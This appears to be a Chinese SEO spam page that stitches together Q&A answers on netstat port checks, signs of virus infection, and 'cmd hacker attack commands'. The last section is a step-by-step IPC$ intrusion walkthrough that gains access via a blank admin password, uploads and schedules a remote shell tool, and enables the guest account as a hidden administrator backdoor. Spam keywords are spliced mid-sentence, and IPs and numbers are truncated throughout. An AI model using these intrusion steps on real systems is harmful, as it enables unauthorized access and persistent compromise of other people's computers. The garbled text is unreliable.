皮皮网
皮皮网

【小广告源码】【源码公有】【eclips源码】netstat命令源码_netstat命令原理

来源:苹果cms影院源码 发表时间:2024-11-25 11:00:19

1.linux如何查看端口被哪个进程占用 / 源码寺
2.怎么判断我的命码n命令电脑有没有中病毒?
3.跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有

netstat命令源码_netstat命令原理

linux如何查看端口被哪个进程占用 / 源码寺

       Linux查看端口占用,令源参考命令如下:

netstat -anltp|grep port

       注:以上请替换port为自己需要查看的原理端口,查询显示的命码n命令信息就包含端口占用使用进程。

怎么判断我的令源电脑有没有中病毒?

       或许长了点。

       病毒与软、原理小广告源码硬件故障的命码n命令区别和联系

       电脑出故障不只是因为感染病毒才会有的,个人电脑使用过程中出现各种故障现象多是令源因为电脑本身的软、硬件故障引起的原理,网络上的命码n命令多是由于权限设置所致。我们只有充分地了解两者的令源区别与联系,才能作出正确的原理判断,在真正病毒来了之时才会及时发现。命码n命令下面我就简要列出了分别因病毒和软、令源硬件故障引起的原理一些常见电脑故障症状分析。

       症状 病毒的入侵的可能性 软、硬件故障的可能性

       经常死机:病毒打开了许多文件或占用了大量内存;不稳定(如内存质量差,硬件超频性能差等);运行了大容量的软件占用了大量的内存和磁盘空间;使用了一些测试软件(有许多BUG);硬盘空间不够等等;运行网络上的软件时经常死机也许是由于网络速度太慢,所运行的程序太大,或者自己的工作站硬件配置太低。

       系统无法启动:病毒修改了硬盘的引导信息,或删除了某些启动文件。如引导型病毒引导文件损坏;硬盘损坏或参数设置不正确;系统文件人为地误删除等。

       文件打不开:病毒修改了文件格式;病毒修改了文件链接位置。文件损坏;硬盘损坏;文件快捷方式对应的链接位置发生了变化;原来编辑文件的软件删除了;如果是在局域网中多表现为服务器中文件存放位置发生了变化,而工作站没有及时涮新服器的内容(长时间打开了资源管理器)。

       经常报告内存不够:病毒非法占用了大量内存;打开了大量的软件;运行了需内存资源的软件;系统配置不正确;内存本就不够(目前基本内存要求为M)等。

       提示硬盘空间不够:病毒复制了大量的病毒文件(这个遇到过好几例,有时好端端的近G硬盘安装了一个WIN或WINNT4.0系统就说没空间了,一安装软件就提示硬盘空间不够。硬盘每个分区容量太小;安装了大量的大容量软件;所有软件都集中安装在一个分区之中;硬盘本身就小;如果是在局域网中系统管理员为每个用户设置了工作站用户的"私人盘"使用空间限制,因查看的是整个网络盘的大小,其实"私人盘"上容量已用完了。

       软盘等设备未访问时出读写信号:病毒感染;软盘取走了还在打开曾经在软盘中打开过的文件。

       出现大量来历不明的源码公有文件:病毒复制文件;可能是一些软件安装中产生的临时文件;也或许是一些软件的配置信息及运行记录。

       启动黑屏:病毒感染(记得最深的是年的4.,我为CIH付出了好几千元的代价,那天我第一次开机到了Windows画面就死机了,第二次再开机就什么也没有了);显示器故障;显示卡故障;主板故障;超频过度;CPU损坏等等

       数据丢失:病毒删除了文件;硬盘扇区损坏;因恢复文件而覆盖原文件;如果是在网络上的文件,也可能是由于其它用户误删除了。

       键盘或鼠标无端地锁死:病毒作怪,特别要留意"木马";键盘或鼠标损坏;主板上键盘或鼠标接口损坏;运行了某个键盘或鼠标锁定程序,所运行的程序太大,长时间系统很忙,表现出按键盘或鼠标不起作用。

       系统运行速度慢:病毒占用了内存和CPU资源,在后台运行了大量非法操作;硬件配置低;打开的程序太多或太大;系统配置不正确;如果是运行网络上的程序时多数是由于你的机器配置太低造成,也有可能是此时网路上正忙,有许多用户同时打开一个程序;还有一种可能就是你的硬盘空间不够用来运行程序时作临时交换数据用。

       系统自动执行操作:病毒在后台执行非法操作;用户在注册表或启动组中设置了有关程序的自动运行;某些软件安装或升级后需自动重启系统。

       通过以上的分析对比,我们知道其实大多数故障都可能是由于人为或软、硬件故障造成的,当我们发现异常后不要急于下断言,在杀毒还不能解决的情况下,应仔细分析故障的特征,排除软、硬件及人为的可能性。

       病毒的分类及各自的特征

       要真正地识别病毒,及时的查杀病毒,我们还有必要对病毒有一番较详细的了解,而且越详细越好!

       病毒因为由众多分散的个人或组织单独编写,也没有一个标准去衡量、去划分,所以病毒的分类可按多个角度大体去分。

       如按传染对象来分,病毒可以划分为以下几类:

       a、引导型病毒

       这类病毒攻击的eclips源码对象就是磁盘的引导扇区,这样就能使系统在启动时获得优先的执行权,从而达到控制整个系统的目的,这类病毒因为感染的是引导扇区,所以造成的损失也就比较大,一般来说会造成系统无法正常启动,但查杀这类病毒也较容易,多数杀毒软件都能查杀这类病毒,如KV、KILL系列等。

       b、文件型病毒

       早期的这类病毒一般是感染以exe、com等为扩展名的可执行文件,这样的话当你执行某个可执行文件时病毒程序就跟着激活。近期也有一些病毒感染以dll、ovl、sys等为扩展名的文件,因为这些文件通常是某程序的配置、链接文件,所以执行某程序时病毒也就自动被子加载了。它们加载的方法是通过插入病毒代码整段落或分散插入到这些文件的空白字节中,如CIH病毒就是把自己拆分成9段嵌入到PE结构的可执行文件中,感染后通常文件的字节数并不见增加,这就是它的隐蔽性的一面。

       c、网络型病毒

       这种病毒是近几来网络的高速发展的产物,感染的对象不再局限于单一的模式和单一的可执行文件,而是更加综合、更加隐蔽。现在一些网络型病毒几乎可以对所有的OFFICE文件进行感染,如WORD、EXCEL、电子邮件等。其攻击方式也有转变,从原始的etm源码删除、修改文件到现在进行文件加密、窃取用户有用信息(如黑客程序)等,传播的途经也发生了质的飞跃,不再局限磁盘,而是通过更加隐蔽的网络进行,如电子邮件、电子广告等。

       d、复合型病毒

       把它归为"复合型病毒",是因为它们同时具备了"引导型"和"文件型"病毒的某些特点,它们即可以感染磁盘的引导扇区文件,也可以感染某此可执行文件,如果没有对这类病毒进行全面的清除,则残留病毒可自我恢复,还会造成引导扇区文件和可执行文件的感染,所以这类病毒查杀难度极大,所用的杀毒软件要同时具备查杀两类病毒的功能。

       以上是按照病毒感染的对象来分,如果按病毒的破坏程度来分,我们又可以将病毒划分为以下几种:

       a、良性病毒:

       这些病毒之所以把它们称之为良性病毒,是因为它们入侵的目的不是破坏你的系统,只是想玩一玩而已,多数是一些初级病毒发烧友想测试一下自己的开发病毒程序的水平。它们并不想破坏你的系统,只是发出某种声音,或出现一些提示,除了占用一定的硬盘空间和CPU处理时间外别无其它坏处。如一些木马病毒程序也是这样,只是想窃取你电脑中的一些通讯信息,如密码、IP地址等,以备有需要时用。

       b、moder 源码恶性病毒

       我们把只对软件系统造成干扰、窃取信息、修改系统信息,不会造成硬件损坏、数据丢失等严重后果的病毒归之为"恶性病毒",这类病毒入侵后系统除了不能正常使用之外,别无其它损失,系统损坏后一般只需要重装系统的某个部分文件后即可恢复,当然还是要杀掉这些病毒之后重装系统。

       c、极恶性病毒

       这类病毒比上述b类病毒损坏的程度又要大些,一般如果是感染上这类病毒你的系统就要彻底崩溃,根本无法正常启动,你保分留在硬盘中的有用数据也可能随之不能获取,轻一点的还只是删除系统文件和应用程序等。

       d、灾难性病毒

       这类病毒从它的名字我们就可以知道它会给我们带来的破坏程度,这类病毒一般是破坏磁盘的引导扇区文件、修改文件分配表和硬盘分区表,造成系统根本无法启动,有时甚至会格式化或锁死你的硬盘,使你无法使用硬盘。如果一旦染上这类病毒,你的系统就很难恢复了,保留在硬盘中的数据也就很难获取了,所造成的损失是非常巨大的,所以我们进化论什么时候应作好最坏的打算,特别是针对企业用户,应充分作好灾难性备份,还好现在大多数大型企业都已认识到备份的意义所在,花巨资在每天的系统和数据备份上,虽然大家都知道或许几年也不可能遇到过这样灾难性的后果,但是还是放松这"万一"。我所在的雀巢就是这样,而且还非常重视这个问题。如年4.发作的CIH病毒就可划归此类,因为它不仅对软件造成破坏,更直接对硬盘、主板的BIOS等硬件造成破坏。

       如按其入侵的方式来分为以下几种:

       a、源代码嵌入攻击型

       从它的名字我们就知道这类病毒入侵的主要是高级语言的源程序,病毒是在源程序编译之前插入病毒代码,最后随源程序一起被编译成可执行文件,这样刚生成的文件就是带毒文件。当然这类文件是极少数,因为这些病毒开发者不可能轻易得到那些软件开发公司编译前的源程序,况且这种入侵的方式难度较大,需要非常专业的编程水平。

       b、代码取代攻击型

       这类病毒主要是用它自身的病毒代码取代某个入侵程序的整个或部分模块,这类病毒也少见,它主要是攻击特定的程序,针对性较强,但是不易被发现,清除起来也较困难。

       c、系统修改型

       这类病毒主要是用自身程序覆盖或修改系统中的某些文件来达到调用或替代操作系统中的部分功能,由于是直接感染系统,危害较大,也是最为多见的一种病毒类型,多为文件型病毒。

       d、外壳附加型

       这类病毒通常是将其病毒附加在正常程序的头部或尾部,相当于给程序添加了一个外壳,在被感染的程序执行时,病毒代码先被执行,然后才将正常程序调入内存。目前大多数文件型的病毒属于这一类。

       有了病毒的一些基本知识后现在我们就可以来检查你的电脑中是否含有病毒,要知道这些我们可以按以下几个方法来判断。

       1、反病毒软件的扫描法

       这恐怕是我们绝大数朋友首选,也恐怕是唯一的选择,现在病毒种类是越来越多,隐蔽的手段也越来越高明,所以给查杀病毒带来了新的难度,也给反病毒软件开发商带来挑战。但随着计算机程序开发语言的技术性提高、计算机网络越来越普及,病毒的开发和传播是越来越容易了,因而反病毒软件开发公司也是越来越多了。但目前比较有名的还是那么几个系统的反病毒软件,如金山毒霸等。至于这些反病毒软件的使用在此就不必说叙了,我相信大家都有这个水平!

       2、观察法

       这一方法只有在了解了一些病毒发作的症状及常栖身的地方才能准确地观察到。如硬盘引导时经常出现死机、系统引导时间较长、运行速度很慢、不能访问硬盘、出现特殊的声音或提示等上述在第一大点中出现的故障时,我们首先要考虑的是病毒在作怪,但也不能一条胡洞走到底,上面我不是讲了软、硬件出现故障同样也可能出现那些症状嘛!对于如属病毒引起的我们可以从以下几个方面来观察:

       a、内存观察

       这一方法一般用在DOS下发现的病毒,我们可用DOS下的"mem/c/p"命令来查看各程序占用内存的情况,从中发现病毒占用内存的情况(一般不单独占用,而是依附在其它程序之中),有的病毒占用内存也比较隐蔽,用"mem/c/p"发现不了它,但可以看到总的基本内存K之中少了那么区区1k或几K。

       b、注册表观察法

       这类方法一般适用于近来出现的所谓黑客程序,如木马程序,这些病毒一般是通过修改注册表中的启动、加载配置来达到自动启动或加载的,一般是在如下几个地方实现:

       [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion

       等等,具体可参考我的另一篇文章--《通通透透看木马》,在其中对注册表中可能出现的地方会有一个比较详尽的分析。

       c、系统配置文件观察法

       这类方法一般也是适用于黑客类程序,这类病毒一般在隐藏在system.ini 、wini.ini(Win9x/WinME)和启动组中,在system.ini文件中有一个"shell="项,而在wini.ini文件中有"load= "、"run= "项,这些病毒一般就是在这些项目中加载它们自身的程序的,注意有时是修改原有的某个程序。我们可以运行Win9x/WinME中的msconfig.exe程序来一项一项查看。具体也可参考我的《通通透透看木马》一文。

       d、特征字符串观察法

       这种方法主要是针对一些较特别的病毒,这些病毒入侵时会写相应的特征代码,如CIH病毒就会在入侵的文件中写入"CIH"这样的字符串,当然我们不可能轻易地发现,我们可以对主要的系统文件(如Explorer.exe)运用进制代码编辑器进行编辑就可发现,当然编辑之前最好还要要备份,毕竟是主要系统文件。

       e、硬盘空间观察法

       有些病毒不会破坏你的系统文件,而仅是生成一个隐藏的文件,这个文件一般内容很少,但所占硬盘空间很大,有时大得让你的硬盘无法运行一般的程序,但是你查又看不到它,这时我们就要打开资源管理器,然后把所查看的内容属性设置成可查看所有属性的文件(这方法应不需要我来说吧?),相信这个庞然大物一定会到时显形的,因为病毒一般把它设置成隐藏属性的。到时删除它即可,这方面的例子在我进行电脑网络维护和个人电脑维修过程中见到几例,明明只安装了几个常用程序,为什么在C盘之中几个G的硬盘空间显示就没有了,经过上述方法一般能很快地让病毒显形的。

跪求cmd黑客攻击指令和cmd电脑命令!悬赏大大滴有

       一 相关命令

       建立空连接:

       net use \\IP\ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格)

       建立非空连接:

       net use \\IP\ipc$ "用户名" /user:"密码" (同样有3个空格)

       映射默认共享:

       net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的c盘映射为自己的z盘,其他盘类推)

       如果已经和目标建立了ipc$,则可以直接用IP+盘符+$访问,具体命令 net use z: \\IP\c$

       删除一个ipc$连接

       net use \\IP\ipc$ /del

       删除共享映射

       net use c: /del 删除映射的c盘,其他盘类推

       net use * /del 删除全部,会有提示要求按y确认

       提示:对于不熟悉命令行操作的朋友来说.建立ipc$连接后,可以在"我的电脑"或"网上邻居"右键映射网络驱动器,效果一样.

       二 经典入侵模式

       1. C:\>net use \\.0.0.1\IPC$ "" /user:"admintitrators"

       这是用《流光》扫到的用户名是administrators,密码为"空"的IP地址(空口令?哇,运气好到家了),如果是打算攻击的话,就可以用这样的命令来与.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。

       2. C:\>copy srv.exe \\.0.0.1\admin$

       先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。

       3. C:\>net time \\.0.0.1

       查查时间,发现.0.0.1 的当前时间是 /3/ 上午 :,命令成功完成。

       4. C:\>at \\.0.0.1 : srv.exe

       用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!)

       5. C:\>net time \\.0.0.1

       再查查到时间没有?如果.0.0.1 的当前时间是 /3/ 上午 :,那就准备开始下面的命令。

       6. C:\>telnet .0.0.1

       这里会用到Telnet命令吧,注意端口是。Telnet默认的是端口,但是我们使用的是SRV在对方计算机中为我们建立一个端口的Shell。

       虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了

       7.C:\>copy ntlm.exe \\.0.0.1\admin$

       用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。

       8. C:\WINNT\system>ntlm

       输入ntlm启动(这里的C:\WINNT\system>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!

       9.Telnet .0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)

       为了以防万一,我们再把guest激活加到管理组

       . C:\>net user guest /active:yes

       将对方的Guest用户激活

       . C:\>net user guest

       将Guest的密码改为,或者你要设定的密码

       . C:\>net localgroup administrators guest /add

       将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机).

       ipc$经典入侵步骤:

       1、net use \\ip\ipc$ 密码 /user:用户名

       2、copy 文件名 \\ip\c$

       3、net time \\ip

       4、at \\ip 时间 命令

       5、入侵成功,连接你的肉鸡

       常用的网络命令

       net user 查看用户列表

       net user 用户名 密码 /add 添加用户

       net user 用户名 密码 更改用户密码

       net localgroup administrators 用户名 /add 添加用户到管理组

       net user 用户名 /delete 删除用户

       net user 用户名 查看用户的基本情况

       net user 用户名 /active:no 禁用该用户

       net user 用户名 /active:yes 启用该用户

       net share 查看计算机IPC$共享资源

       net share 共享名 查看该共享的情况

       net share 共享名=路径 设置共享。例如 net share c$=c:

       net share 共享名 /delete 删除IPC$共享

       net stop lanmanserver 关闭ipc$和默认共享依赖的服务

       net use 查看IPC$连接情况

       net use \\ip\ipc$ "密码" /user:"用户名" ipc$连接

       net use \\ip\ipc$ /del 删除一个连接

       net use z: \\目标IP\c$ "密码" /user:"用户名" 将对方的c盘映射为自己的z盘

       net use z: /del

       net time \\ip 查看远程计算机上的时间

       copy 路径:\文件名 \\ip\共享名复制文件到已经ipc$连接的计算机上

       net view ip 查看计算机上的共享资源

       at 查看自己计算机上的计划作业

       at \\ip 查看远程计算机上的计划作业

       at \\ip 时间 命令(注意加盘符) 在远程计算机上加一个作业

       at \\ip 计划作业ID /delete 删除远程计算机上的一个计划作业

       at \\ip all /delete 删除远程计算机上的全部计划作业

       at \\ip time "echo 5 > c:\t.txt" 在远程计算机上建立文本文件t.txt;

       下面纯手打,上面是度娘给的

       taskkill /im 进程名 停止运行

       tasklisy 查看运行进程

       ipconfig 查看本机IP

       md 创建文件夹

       rd 删除文件夹

       echo off > .txt|exit 添加文本

       echo 内容 >> .txt 给文本添加内容

       copy 复制文件

       net user 用户名 密码/add 创建一个普通账号

       net localgroup administrators 用户名 /add 把账户加入超级用户组

相关栏目:焦点

.重点关注